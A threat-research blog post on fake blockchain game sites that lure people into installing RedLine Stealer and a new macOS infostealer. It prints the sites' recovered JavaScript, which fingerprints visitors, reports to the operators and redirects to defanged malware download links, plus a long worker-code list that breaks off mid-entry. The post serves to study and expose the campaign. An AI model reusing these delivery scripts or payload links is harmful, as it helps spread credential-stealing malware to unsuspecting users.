Fake Blockchain Games Deliver RedLine Stealer & Realst Stealer - A New macOS Infostealer Malware

Intro

Last April, ReDzin asked me about a project named "Pearl Land Metaverse", which he found sketchy. The funny thing is that it's the same fake project I covered previously, PureLand, but with the name being changed.

Then in May, several individuals pinged about other projects: Destruction, Evolion, Olymp of Reptiles, and Brawl Earth. Later on, I found similar fake projects named RyzeX, Dawn Land MetaWorld, and WildWorld. An old fake project that I've been monitoring since last year has also followed the same patterns.

Left to right: https://twitter.com/DestructionNFTs (1552873215667871744) | https://twitter.com/EvolionGame (1626416120017166337) | https://twitter.com/olympreptiles (1513696035914358785) | https://twitter.com/brawlearth (2889955382) | https://twitter.com/Meta_Dawn (1617051516040249345) | https://twitter.com/WildmenWorld (616871862) | https://twitter.com/RyzeX_web3 (1516416630213181441) | https://twitter.com/guardiansmeta (1580771215173914624)

As usual, they distribute RedLine Stealer malware. Though what caught my interest the most was their macOS build. It's new, so there is no public intel about this...yet.

Lures, codes, and workers

The targets are lured into running the malicious applications by the workers via direct messaging them or by simply posting an advertisement.

Left to right: https://twitter.com/KomandoETH (ID: 814099622) | https://twitter.com/Evoliongame_mng (ID: 124632942) | https://twitter.com/BryantDeg/status/1648026547356332052 | https://twitter.com/0xtheSamGor/status/1650910409229221888 | https://twitter.com/0xGuy/status/1661465619882029057

Usually, they give out "access/referral codes" as the form on the website asks for it to be able to download the file/s.

Screenshots of the forms

There are instances where the download buttons are displayed on the website immediately.

The "access/referral codes" aim to identify which worker lured the target into downloading the malicious file/s. Here are some examples:

Pearl Metaverse Land code input

Once the target enters the code, a POST request is sent to the backend to check it.

Take note of the worker @MonkeyyDrainer, it is a Telegram username and we will see it again later. (Worth mentioning that a malicious actor known as "Monkey Drainer" operated a cryptocurrency wallet drainer as a service in the past. It is unknown whether @MonkeyyDrainer is a big fan or an alt account.)

One can also peek at the page's source to see what's happening, this shows the comments in Russian, Dropbox links, and methods to notify the malicious actors.

JavaScript (4-25-2023)

<script>
    var deviceInfo = {
        browser: "",
        version: "",
        platform: navigator.platform
    };

var ua = navigator.userAgent,
    browser = "";

if (ua.search(/Edge/) > -1) {
    browser = "Edge";
} else if (ua.search(/Firefox/) > -1) {
    browser = "Firefox";
} else if (ua.search(/Opera/) > -1) {
    browser = "Opera";
} else if (ua.search(/Chrome/) > -1) {
    browser = "Chrome";
} else if (ua.search(/MSIE/) > -1) {
    browser = "IE";
} else if (ua.search(/Safari/) > -1) {
    browser = "Safari";
} else {
    browser = "Other";
}

deviceInfo.browser = browser;
deviceInfo.version = (ua.indexOf("Chrome") !== -1) ? ua.substring(ua.indexOf("Chrome") + 7).split(" ")[0] : ((ua.indexOf("Safari") !== -1) ? ua.substring(ua.indexOf("Version") + 8).split(" ")[0] : "Unknown");
// form valid

async function validateForm() {
        const input1 = $('#input1').val().toUpperCase();
        const input2 = $('#input2').val().toUpperCase();
        const input3 = $('#input3').val().toUpperCase();
        const input4 = $('#input4').val().toUpperCase();
        const input5 = $('#input5').val().toUpperCase();
        const input6 = $('#input6').val().toUpperCase();
        const validationMessage = $('#validation-message');

        // Создание объекта FormData для отправки данных на сервер
        const formData = new FormData();
        formData.append('input1', input1);
        formData.append('input2', input2);
        formData.append('input3', input3);
        formData.append('input4', input4);
        formData.append('input5', input5);
        formData.append('input6', input6);

        // Отправка POST запроса на сервер для проверки значений
        const response = await fetch('check.php', {
            method: 'POST',
            body: formData,
        });

        // Обработка ответа от сервера
        if (response.ok) {
            const result = await response.json();
            if (result.result === 'success') {
                // Получение значений воркера, типа файла и адреса из ответа
                const worker = result.worker;
                const file = result.file;
                const address = result.address;
                const dataIpResponse = await fetch('hxxps[://]ipapi[.]co/json/');
                if (dataIpResponse.ok) {
                    const dataIp = await dataIpResponse.json();
                    $.ajax({
                        type: 'POST',
                        url: './js/send.php',
                        data: {
                            ip: dataIp.ip,
                            country_name: dataIp.country_name,
                            worker,
                            file,
                            deviceInfo
                        },
                        success: function(data) {
                            window.location.href = address;
                        },
                        error: function(xhr, status, error) {
                            window.location.href = address;
                        },
                    });
                }
            } else if (input1 + input2 + input3 + input4 + input5 + input6 == 'F9SEWR') {
                var file = "Launcher";
                var worker = "Special";
                var dataIp = await $.getJSON("hxxps[://]ipapi[.]co/json/");
                $.ajax({
                    type: "POST",
                    url: "../js/send.php",
                    data: {
                        ip: dataIp.ip,
                        country_name: dataIp.country_name,
                        worker,
                        file,
                        deviceInfo
                    },
                    success: function(data) {
                        window.location.href = "hxxps[://]www[.]dropbox[.]com/s/r09eesrdkwtg8mu/Pearl%20Land%20Launcher[.]exe?dl=1"
                    },
                    error: function(xhr, status, error) {
                        window.location.href = "hxxps[://]www[.]dropbox[.]com/s/r09eesrdkwtg8mu/Pearl%20Land%20Launcher[.]exe?dl=1"
                    },
                });
            } else if (input1 + input2 + input3 + input4 + input5 + input6 == 'F9SE2Q') {
                var file = "Archive";
                var worker = "Special";
                var dataIp = await $.getJSON("hxxps[://]ipapi[.]co/json/");
                $.ajax({
                    type: "POST",
                    url: "../js/send.php",
                    data: {
                        ip: dataIp.ip,
                        country_name: dataIp.country_name,
                        worker,
                        file,
                        deviceInfo
                    },
                    success: function(data) {
                        window.location.href = "hxxps[://]pearlmetaverse[.]io/"
                    },
                    error: function(xhr, status, error) {
                        window.location.href = "hxxps[://]pearlmetaverse[.]io/"
                    },
                });
            } else if (input1 + input2 + input3 + input4 + input5 + input6 == 'F9QF0R') {
                var file = "Mac";
                var worker = "Special";
                var dataIp = await $.getJSON("hxxps[://]ipapi[.]co/json/");
                $.ajax({
                    type: "POST",
                    url: "../js/send.php",
                    data: {
                        ip: dataIp.ip,
                        country_name: dataIp.country_name,
                        worker,
                        file,
                        deviceInfo
                    },
                    success: function(data) {
                        window.location.href = "hxxps[://]www[.]dropbox[.]com/s/8d6t95xu7x2qbpk/Pearl%20Land%20Launcher%20v3[.]pkg?dl=1"
                    },
                    error: function(xhr, status, error) {
                        window.location.href = "hxxps[://]www[.]dropbox[.]com/s/8d6t95xu7x2qbpk/Pearl%20Land%20Launcher%20v3[.]pkg?dl=1"
                    },
                });
            } else {
                validationMessage.show();
                $('#input1').css('border', '2px solid #F13F5F');
                $('#input2').css('border', '2px solid #F13F5F');
                $('#input3').css('border', '2px solid #F13F5F');
                $('#input4').css('border', '2px solid #F13F5F');
                $('#input5').css('border', '2px solid #F13F5F');
                $('#input6').css('border', '2px solid #F13F5F');
            }
            // Передача ответа от сервера на проверку значений в Index.php
            $('#response').html(result.result);
        } else {
            console.log('Error: ' + response.status);
        }
    } <
    </script>

Dawn Land MetaWorld code input

If you've noticed earlier, the page for the code input is similar to Pearl Metaverse Land. The JavaScript code is also similar.

JavaScript (5-21-2023)

var deviceInfo = {
    browser: "",
    version: "",
    platform: navigator.platform
};

var ua = navigator.userAgent,
    browser = "";

if (ua.search(/Edge/) > -1) {
    browser = "Edge";
} else if (ua.search(/Firefox/) > -1) {
    browser = "Firefox";
} else if (ua.search(/Opera/) > -1) {
    browser = "Opera";
} else if (ua.search(/Chrome/) > -1) {
    browser = "Chrome";
} else if (ua.search(/MSIE/) > -1) {
    browser = "IE";
} else if (ua.search(/Safari/) > -1) {
    browser = "Safari";
} else {
    browser = "Other";
}

deviceInfo.browser = browser;
deviceInfo.version = (ua.indexOf("Chrome") !== -1) ? ua.substring(ua.indexOf("Chrome") + 7).split(" ")[0] : ((ua.indexOf("Safari") !== -1) ? ua.substring(ua.indexOf("Version") + 8).split(" ")[0] : "Unknown");
// form valid

async function validateForm() {
    const input1 = $('#input1').val().toUpperCase();
    const input2 = $('#input2').val().toUpperCase();
    const input3 = $('#input3').val().toUpperCase();
    const input4 = $('#input4').val().toUpperCase();
    const input5 = $('#input5').val().toUpperCase();

    const validationMessage = $('#validation-message');

    // Создание объекта FormData для отправки данных на сервер
    const formData = new FormData();
    formData.append('input1', input1);
    formData.append('input2', input2);
    formData.append('input3', input3);
    formData.append('input4', input4);
    formData.append('input5', input5);


    // Отправка POST запроса на сервер для проверки значений
    const response = await fetch('check.php', {
        method: 'POST',
        body: formData,
    });

    // Обработка ответа от сервера
    if (response.ok) {
        const result = await response.json();
        if (result.result === 'success') {
            // Получение значений воркера, типа файла и адреса из ответа
            const worker = result.worker;
            const file = result.file;
            const address = result.address;
            const dataIpResponse = await fetch('hxxps[://]ipapi[.]co/json/');
            if (dataIpResponse.ok) {
                const dataIp = await dataIpResponse.json();
                $.ajax({
                    type: 'POST',
                    url: './assets/js/send.php',
                    data: {
                        ip: dataIp.ip,
                        country_name: dataIp.country_name,
                        worker,
                        file,
                        deviceInfo
                    },
                    success: function(data) {
                        window.location.href = address;
                    },
                    error: function(xhr, status, error) {
                        window.location.href = address;
                    },
                });
            }
        } else if (input1 + input2 + input3 + input4 + input5 == 'F9SEW') {
            var file = "Launcher";
            var worker = "Special";
            var dataIp = await $.getJSON("hxxps[://]ipapi[.]co/json/");
            $.ajax({
                type: "POST",
                url: "./assets/js/send.php",
                data: {
                    ip: dataIp.ip,
                    country_name: dataIp.country_name,
                    worker,
                    file,
                    deviceInfo
                },
                success: function(data) {
                    window.location.href = "hxxps[://]www[.]dropbox[.]com/s/6a68btb9zfhbuut/Dawn%20Land%20Launcher[.]exe?dl=1"
                },
                error: function(xhr, status, error) {
                    window.location.href = "hxxps[://]www[.]dropbox[.]com/s/6a68btb9zfhbuut/Dawn%20Land%20Launcher[.]exe?dl=1"
                },
            });
        } else if (input1 + input2 + input3 + input4 + input5 == 'F9SE2') {
            var file = "Archive";
            var worker = "Special";
            var dataIp = await $.getJSON("hxxps[://]ipapi[.]co/json/");
            $.ajax({
                type: "POST",
                url: "./assets/js/send.php",
                data: {
                    ip: dataIp.ip,
                    country_name: dataIp.country_name,
                    worker,
                    file,
                    deviceInfo
                },
                success: function(data) {
                    window.location.href = "dawnmeta.io"
                },
                error: function(xhr, status, error) {
                    window.location.href = "dawnmeta.io"
                },
            });
        } else if (input1 + input2 + input3 + input4 + input5 == 'F9QF0') {
            var file = "Mac";
            var worker = "Special";
            var dataIp = await $.getJSON("hxxps[://]ipapi[.]co/json/");
            $.ajax({
                type: "POST",
                url: "./assets/js/send.php",
                data: {
                    ip: dataIp.ip,
                    country_name: dataIp.country_name,
                    worker,
                    file,
                    deviceInfo
                },
                success: function(data) {
                    window.location.href = "hxxps[://]www[.]dropbox[.]com/s/ty0pyvkpc84i50m/Dawn%20Land%20Launcher[.]pkg?dl=1"
                },
                error: function(xhr, status, error) {
                    window.location.href = "hxxps[://]www[.]dropbox[.]com/s/ty0pyvkpc84i50m/Dawn%20Land%20Launcher[.]pkg?dl=1"
                },
            });
        } else {
            validationMessage.show();
            $('#input1').css('border', '2px solid #F13F5F');
            $('#input2').css('border', '2px solid #F13F5F');
            $('#input3').css('border', '2px solid #F13F5F');
            $('#input4').css('border', '2px solid #F13F5F');
            $('#input5').css('border', '2px solid #F13F5F');
        }
        // Передача ответа от сервера на проверку значений в Index.php
        $('#response').php(result.result);
    } else {
        console.log('Error: ' + response.status);
    }
}
$('#form-popup').submit(function(event) {
    event.preventDefault();
    validateForm();
});

Evolion code input

Once the code is entered and the download button is clicked, code.json is retrieved, which contains the id, code, worker, and download link.

JavaScript (5-1-2023)

// Открыть модальное окно
document.getElementById("open-modal-btn-one").addEventListener("click", function() {
    document.getElementById("my-modal").classList.add("open")
})

// Закрыть модальное окно
document.getElementById("close-my-modal-btn").addEventListener("click", function() {
    document.getElementById("my-modal").classList.remove("open")
})

// Закрыть модальное окно при нажатии на Esc
window.addEventListener('keydown', (e) => {
    if (e.key === "Escape") {
        document.getElementById("my-modal").classList.remove("open")
    }
});

// Закрыть модальное окно при клике вне его
document.querySelector("#my-modal .modal__box").addEventListener('click', event => {
    event._isClickWithInModal = true;
});
document.getElementById("my-modal").addEventListener('click', event => {
    if (event._isClickWithInModal) return;
    event.currentTarget.classList.remove('open');
});

// Открыть модальное окно
document.getElementById("open-modal-btn").addEventListener("click", function() {
    document.getElementById("my-modal").classList.add("open")
})

// Закрыть модальное окно
document.getElementById("close-my-modal-btn").addEventListener("click", function() {
    document.getElementById("my-modal").classList.remove("open")
})

// Закрыть модальное окно при нажатии на Esc
window.addEventListener('keydown', (e) => {
    if (e.key === "Escape") {
        document.getElementById("my-modal").classList.remove("open")
    }
});

// Закрыть модальное окно при клике вне его
document.querySelector("#my-modal .modal__box").addEventListener('click', event => {
    event._isClickWithInModal = true;
});
document.getElementById("my-modal").addEventListener('click', event => {
    if (event._isClickWithInModal) return;
    event.currentTarget.classList.remove('open');
});

document.querySelector('#signin').addEventListener('submit', e => {
   e.preventDefault()
   const input = e.target.querySelector('input')
   if (e.target.querySelector('input').value.trim()) {
      fetch(`/code.json?1=${Math.random()}`)
      .then(response => response.json())
      .then(data => {
         console.log(data)
         let flag = false;
         data.forEach(item => {
            if (item.code == input.value) {
               window.location.href = item.link
               flag = true

               fetch('/telegram_curl.php', {
                  method: 'post',
                  body: JSON.stringify({code: input.value}),
                  headers: {
                     'content-type': 'application/json'
                  }
               })

               return
            }
         })

         if (!flag) {
            input.classList.add('shakes')
            setTimeout(() => input.classList.remove('shakes'), 800)
            e.preventDefault()
            return
         }
      });
   }
})

code.json (5-1-2023)

[
    {
        "id": 1,
        "code": "JW1Q-O99P",
        "worker": "All RAR Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 2,
        "code": "L18N-VZZ0",
        "worker": "All MAC Code",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 3,
        "code": "AA98-1QMN",
        "worker": "All Launcher Code",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 4,
        "code": "ZZ19-W92L",
        "worker": "12jet3web - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 5,
        "code": "ZZ19-W913",
        "worker": "12jet3web - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 6,
        "code": "ZZ19-WZM1",
        "worker": "12jet3web - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 7,
        "code": "AQ6M-Y88N",
        "worker": "My code",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 8,
        "code": "MN21-TT1K",
        "worker": "12BillionCounter - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 9,
        "code": "MN21-TK99",
        "worker": "12BillionCounter - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 10,
        "code": "MN21-71HG",
        "worker": "12BillionCounter - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 11,
        "code": "OO19-Z8N0",
        "worker": "12Ombrre - Lauch",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 12,
        "code": "OO19-Z8QQ",
        "worker": "12Ombrre - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 14,
        "code": "GH11-D988",
        "worker": "12Nixer1339 - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 15,
        "code": "GH11-D9CM",
        "worker": "12Nixer1339 - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 16,
        "code": "GH11-K99Q",
        "worker": "12Nixer1339 - Launch",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 17,
        "code": "LI28-QAZ1",
        "worker": "12HeisenbergWolter - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 18,
        "code": "LI28-QAZZ",
        "worker": "12HeisenbergWolter - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 19,
        "code": "LI28-PO12",
        "worker": "12HeisenbergWolter - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 20,
        "code": "KL19-DJ21",
        "worker": "12Ombrre",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 21,
        "code": "OO19-Z88G",
        "worker": "12HeisenbergWolter - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 22,
        "code": "OO87-1CB6",
        "worker": "12purification999 - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 23,
        "code": "OO87-1C8L",
        "worker": "12purification999 - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 24,
        "code": "OO87-LO8P",
        "worker": "12purification999 - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 25,
        "code": "X21N-KL88",
        "worker": "12Askwkssk - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 26,
        "code": "X21N-LL90",
        "worker": "12Askwkssk - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 27,
        "code": "X21N-7IO1",
        "worker": "12Askwkssk - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 28,
        "code": "HG87-1VNM",
        "worker": "12wbsceva - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 29,
        "code": "HG87-1VK8",
        "worker": "12wbsceva - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 30,
        "code": "HG87-O71H",
        "worker": "12wbsceva - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 31,
        "code": "Z80B-ML1H",
        "worker": "12atom911 - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 32,
        "code": "Z80B-ML17",
        "worker": "12atom911 - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 33,
        "code": "Z80B-LPP1",
        "worker": "12atom911 - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 34,
        "code": "FG19-1LM7",
        "worker": "12glebredbull - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 35,
        "code": "FG19-1LVN",
        "worker": "12glebredbull - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 36,
        "code": "FG19-AQ11",
        "worker": "12glebredbull - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 37,
        "code": "QW89-1GOP",
        "worker": "12h0pefulrabbit - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 38,
        "code": "QW89-1Z8J",
        "worker": "12h0pefulrabbit - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 39,
        "code": "QW89-K3AA",
        "worker": "12h0pefulrabbit - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 40,
        "code": "H1C8-SAK9",
        "worker": "12bamboombam - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 41,
        "code": "H1C8-Z90N",
        "worker": "12bamboombam - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 42,
        "code": "H1C8-QQ9P",
        "worker": "12bamboombam - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 43,
        "code": "JQO2-RR67",
        "worker": "12SPAN4money - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 44,
        "code": "JQO2-RQ29",
        "worker": "12SPAN4money - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 45,
        "code": "JQO2-RL1K",
        "worker": "12SPAN4money - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 46,
        "code": "AL6M-YY28",
        "worker": "12wwwdew - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 47,
        "code": "AL6M-YQ6P",
        "worker": "12wwwdew - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 48,
        "code": "AL6M-N41G",
        "worker": "12wwwdew - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 49,
        "code": "V1LI-TW80",
        "worker": "12FlashHound4216 - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 50,
        "code": "V1LI-TWS4",
        "worker": "12FlashHound4216 - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 51,
        "code": "V1LI-AK2C",
        "worker": "12FlashHound4216 - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 52,
        "code": "BM8J-12QO",
        "worker": "12benfu18 - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 53,
        "code": "BM8J-12HL",
        "worker": "12benfu18 - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 54,
        "code": "BM8J-Q451",
        "worker": "12benfu18 - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 55,
        "code": "SO64-YRL1",
        "worker": "12bloodyaaron - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 56,
        "code": "SO64-YRVA",
        "worker": "12bloodyaaron - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 57,
        "code": "SO64-2LK8",
        "worker": "12bloodyaaron - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 58,
        "code": "KQ15-Z5KP",
        "worker": "12maisiewilens - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 59,
        "code": "KQ15-ZZK1",
        "worker": "12maisiewilens - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 60,
        "code": "KQ15-LO3A",
        "worker": "12maisiewilens - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 61,
        "code": "WY3J-EK11",
        "worker": "12fishingNFT - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 62,
        "code": "WY3J-EMM2",
        "worker": "12fishingNFT - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 63,
        "code": "WY3J-ELI6",
        "worker": "12fishingNFT - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 64,
        "code": "V8DD-F64N",
        "worker": "12nujenxanax - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 65,
        "code": "V8DD-F6F1",
        "worker": "12nujenxanax - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 66,
        "code": "V8DD-T9JJ",
        "worker": "12nujenxanax - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 67,
        "code": "BL1F-RR83",
        "worker": "12craaassshysh - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 68,
        "code": "BL1F-RA73",
        "worker": "12craaassshysh - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 69,
        "code": "BL1F-RCC0",
        "worker": "12craaassshysh - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 70,
        "code": "GLQ3-U59Z",
        "worker": "12azpunks - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 71,
        "code": "GLQ3-UV1M",
        "worker": "12azpunks - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 72,
        "code": "GLQ3-PI61",
        "worker": "12azpunks - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 73,
        "code": "SS73-IYL9",
        "worker": "12Marif1777 - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 74,
        "code": "SS73-IYHG",
        "worker": "12Marif1777 - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 75,
        "code": "SS73-IY1J",
        "worker": "12Marif1777 - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 76,
        "code": "UQ4J-RX22",
        "worker": "12NEVR2DEVTH - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 77,
        "code": "UQ4J-RZM8",
        "worker": "12NEVR2DEVTH - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 78,
        "code": "UQ4J-PO90",
        "worker": "12NEVR2DEVTH - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 79,
        "code": "DO7L-WWIN",
        "worker": "12number_oneBC - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 80,
        "code": "DO7L-WA62",
        "worker": "12number_oneBC - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 81,
        "code": "DO7L-LO8P",
        "worker": "12number_oneBC - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 82,
        "code": "SJ87-B91R",
        "worker": "12user12574 - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 83,
        "code": "SJ87-BUW1",
        "worker": "12user12574 - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 84,
        "code": "SJ87-BHQQ",
        "worker": "12user12574 - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 85,
        "code": "DH8L-ZX10",
        "worker": "12LiamDrain - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 86,
        "code": "DH8L-ZWU0",
        "worker": "12LiamDrain - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 87,
        "code": "DH8L-LI89",
        "worker": "12LiamDrain - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 88,
        "code": "BIG7-HH28",
        "worker": "12D3ViLBBY - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 89,
        "code": "BIG7-H1JP",
        "worker": "12D3ViLBBY - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 90,
        "code": "BIG7-HKL6",
        "worker": "12D3ViLBBY - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 91,
        "code": "GSQ6-3UIK",
        "worker": "12trueseller - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
